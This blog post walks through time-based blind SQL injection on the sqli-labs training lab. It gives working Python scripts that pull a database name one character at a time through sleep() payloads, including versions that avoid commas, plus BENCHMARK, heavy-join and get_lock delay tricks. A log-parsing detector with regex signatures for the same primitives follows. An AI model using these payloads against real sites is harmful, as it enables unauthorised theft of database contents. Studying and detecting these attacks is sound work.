NEKO

sql blind inject summary

2018/06/26

Taking some time to summarize the techniques for blind SQL injection.

Using sqli-labs as the example.

If sleep() is blocked, use BENCHMARK(10000000,SHA('1')) instead.

Contains ',' but no 'or':

```python
import requests

url = 'http://127.0.0.1/sqli-labs-master/Less-1/index.php'
result = ''

for j in range(1, 50):
    for i in range(33, 125):
        # Compare the suffix of the database name starting at position j with chr(i).
        # "binary" makes the comparison case-sensitive. When the suffix sorts below
        # chr(i) the server sleeps 4 seconds, which the 3-second timeout turns into a
        # boolean oracle.
        url1 = url + "?id=1' and if(substr((select binary database())from %d)<'%s',sleep(4),1)-- -" % (j, chr(i))
        try:
            r = requests.get(url=url1, timeout=3)
        except requests.exceptions.Timeout:
            # First chr(i) that the suffix sorts below: the real character is chr(i-1).
            result += chr(i - 1)
            print(result)
            break
```

No ',' and no 'or':

```python
import requests

url = 'http://127.0.0.1/sqli-labs-master/Less-1/index.php'
result = ''

for j in range(1, 50):
    for i in range(33, 125):
        # Same oracle as above, but CASE WHEN ... THEN ... ELSE ... END replaces the
        # comma-separated arguments of if(), and substr(... from n) avoids the comma
        # in substr(str, n).
        url1 = url + "?id=1' and (select case when (substr((select database())from %d)<'%s') then sleep(4) else 0 end)-- -" % (j, chr(i))
        print('test:', chr(i))
        try:
            r = requests.get(url=url1, timeout=3)
        except requests.exceptions.Timeout:
            result += chr(i - 1)
            print(result)
            break
```

Heavy query (the cross join of information_schema.tables with itself is large enough to act as the delay):

```sql
select if(1=1,(select count(*) from information_schema.tables A,information_schema.tables B,information_schema.tables C,information_schema.tables D),1);
```

get_lock:
Open two mysql sessions.
mysql1:

```
mysql> select get_lock('neko',1);
+--------------------+
| get_lock('neko',1) |
+--------------------+
|                  1 |
+--------------------+
1 row in set (0.00 sec)
```

mysql2:

```
mysql> select get_lock('neko',3);
+--------------------+
| get_lock('neko',3) |
+--------------------+
|                  0 |
+--------------------+
1 row in set (3.00 sec)
```

In practice, the same effect can be obtained by switching IP addresses or by waiting a while.
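Every delay primitive above (sleep(), BENCHMARK(), the information_schema cross join, get_lock()) leaves the same two traces on the server side: the function name inside the injected parameter, and a response time pinned to the injected delay. The detector below is an added example, not code from this post or from sqli-labs. It assumes access-log lines in a combined-log style with the request time in seconds appended as the last field (an assumed format; the sample lines are constructed), URL-decodes each query parameter, matches the primitives shown on this page, and flags responses slower than a threshold so that a burst of flagged, slow requests from one client stands out.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (not from the post). Last field: response time in seconds.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Jun/2018:14:11:44 +0800] "GET /sqli-labs-master/Less-1/index.php?id=1%27%20and%20if(substr((select%20binary%20database())from%201)%3C%27s%27,sleep(4),1)--%20- HTTP/1.1" 200 512 4.003
10.0.0.5 - - [26/Jun/2018:14:11:49 +0800] "GET /sqli-labs-master/Less-1/index.php?id=1%27%20and%20(select%20case%20when%20(substr((select%20database())from%201)%3C%27t%27)%20then%20sleep(4)%20else%200%20end)--%20- HTTP/1.1" 200 512 0.004
10.0.0.5 - - [26/Jun/2018:14:12:01 +0800] "GET /sqli-labs-master/Less-1/index.php?id=1%27%20and%20BENCHMARK(10000000,SHA(%271%27))--%20- HTTP/1.1" 200 512 2.871
10.0.0.9 - - [26/Jun/2018:14:12:05 +0800] "GET /sqli-labs-master/Less-1/index.php?id=1%27%20and%20(select%20count(*)%20from%20information_schema.tables%20A,information_schema.tables%20B,information_schema.tables%20C)--%20- HTTP/1.1" 200 512 9.120
10.0.0.9 - - [26/Jun/2018:14:12:20 +0800] "GET /sqli-labs-master/Less-1/index.php?id=1%27%20and%20get_lock(%27neko%27,5)--%20- HTTP/1.1" 200 512 5.001
192.168.1.20 - - [26/Jun/2018:14:12:30 +0800] "GET /sqli-labs-master/Less-1/index.php?id=7 HTTP/1.1" 200 498 0.003
"""

# Assumed log layout: ip ident user [time] "method target protocol" status bytes seconds
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<rt>[\d.]+)$'
)

# The time-based primitives discussed on the page, matched on decoded, normalized text.
SIGNATURES = {
    "sleep": re.compile(r"\bsleep\s*\("),
    "benchmark": re.compile(r"\bbenchmark\s*\("),
    "get_lock": re.compile(r"\bget_lock\s*\("),
    "case_when_sleep": re.compile(r"\bcase\s+when\b.*\bthen\s+sleep\s*\(", re.S),
    # three or more information_schema tables joined by comma: the "heavy query"
    "heavy_join": re.compile(r"(information_schema\.\w+\s+\w+\s*,\s*){2,}information_schema\.\w+"),
}


def normalize(value: str) -> str:
    """Strip inline comments, collapse whitespace and lower-case so spacing tricks
    and mixed case do not split or hide a keyword."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip().lower()


def classify(value: str) -> list:
    """Return the sorted names of every signature that matches one parameter value."""
    norm = normalize(value)
    return sorted(name for name, pat in SIGNATURES.items() if pat.search(norm))


def analyze(log_text: str, slow_seconds: float = 2.0) -> list:
    """Parse each log line, decode its query string and report every parameter that
    carries a delay primitive, together with whether the response was slow."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unknown layout: skip rather than guess
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):  # parse_qsl decodes %xx
            sigs = classify(value)
            if sigs:
                rt = float(m["rt"])
                findings.append({"ip": m["ip"], "param": name, "signatures": sigs,
                                 "response_time": rt, "slow": rt >= slow_seconds})
    return findings


def summarize(findings: list) -> dict:
    """Per-client counts: how many requests carried a primitive, and how many of those
    actually took the injected delay (the timing half of the oracle)."""
    per_ip = {}
    for f in findings:
        entry = per_ip.setdefault(f["ip"], {"flagged": 0, "slow": 0})
        entry["flagged"] += 1
        entry["slow"] += int(f["slow"])
    return per_ip


if __name__ == "__main__":
    hits = analyze(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["param"], h["signatures"], h["response_time"], "slow" if h["slow"] else "")
    print(summarize(hits))
```

The signature half alone is noisy (a legitimate parameter can contain the word "sleep"), and the timing half alone is noisy (slow pages exist); counting both per client, as summarize() does, is what separates a character-by-character extraction loop from background traffic. A fast response with a matching signature (the second sample line) is still worth keeping: in a time-based oracle the "false" branch returns immediately, so half of the probes look harmless on timing alone.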

Original author: n3k0

Published: June 26th 2018, 2:11:44

Roar: no 魔夜2 to play, I'm dying
